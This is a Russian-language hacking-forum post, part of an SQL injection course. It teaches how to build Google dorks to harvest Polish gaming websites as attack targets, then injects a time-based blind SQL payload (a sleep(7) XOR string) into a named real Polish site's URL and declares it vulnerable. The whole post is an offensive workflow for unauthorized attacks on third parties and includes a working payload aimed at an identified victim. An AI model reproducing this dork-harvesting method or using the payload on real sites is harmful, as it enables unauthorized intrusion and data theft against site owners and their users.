SQL INJECTION from beginner to professional (Lesson Five) creating actual dorks

Приветствую на моем пятом уроке и пускай эта статья особо не имеет отношения с SQL INJ , но я сделал такое название , чтобы людям было легко читать мои статьи (как книгу) просто **** в поиске "SQL INJECTION от новичка до профессионала".Та и вообще , нужно же где-то брать сайты , чтобы сканить на SQL INJ
мой курс по sql inj - https://zelenka.guru/threads/5012873/
мое облако с базами - https://zelenka.guru/threads/5029036/

И так для начала создания дорок нужно определиться с тематикой (гейм/крипта/любая) , а также страна по которой мы будем искать.Я для примера возьму game тематику и страну польшу.Давайте возьмем какой-нибудь польский сайт для примера , чтобы понимать на что на ориентироваться...
Идем в гугл переводчик и вводим какую-нибудь фразу , чтобы найти нужный сайт

Вводим фразу и добавляем site:pl (можно и другие страны .it , .co , .com , .biz и т.д)
К примеру мне понравился вот такой сайт:

И просто копируем словосочетания , которые нас устраивают.Например у меня поучились такие:
Karta Przedpłacona XBOX
aktualizowania gry
swobodnie grać
Abonamenty Karty przedpłacone
Думаю пока хватит...Можно конечно уже запускать парсит , но ведь так не интересно:)Мы можем из этих 4 словосочетаний сделать намного больше.Для этого у меня есть регулярка , которая делает перестановки

Копируем результат и теперь добавляем операторы гугла , чтобы он понимал какие сайты нам выдавать

Сохраняем и добавляем еще один оператор только в начало

Получается вот такая темка

Теперь много раз копируем и вставляем , чтобы по кругу парсер бегал и сайтов было больше , ведь гугл ограничивает выдачу , вы не сможете спарсить сразу 12 миллионов сайтов например.Ведь все зависит от страны и других параметров.

Теперь смотрим на результат:

Удаляем дубликаты

с 28 запросов я получил 800+ уникальных линков.А если бы я много раз продублировал бы дорки , то было бы гораздо больше их

Вы скажете: " а как парсить , ведь ****** и сам парсер стоит , как моя зарплата?".

Я отвечу легко , обращаетесь в мою тему , я могу бесплатно вам напарсить линков под ваши дорки , которые вы скинете мне под хайд: https://zelenka.guru/threads/5076668/

Ну что , теперь погнали тестировать полученные сайты на уязвимости:podumai:

http://www.kolporter.com.pl/ берем вот такой сайтик и подставляем полезную нагрузку
0'XOR(if(now()=sysdate(),sleep(7),0))XOR'Z
http://www.kolporter.com.pl/0'XOR(if(now()=sysdate(),sleep(7),0))XOR'Z
Срабатывает задержка ровно на 7 секунд , а значит тут слепая скуля по time.Вот собственно всё , ничего сложного , главное желание.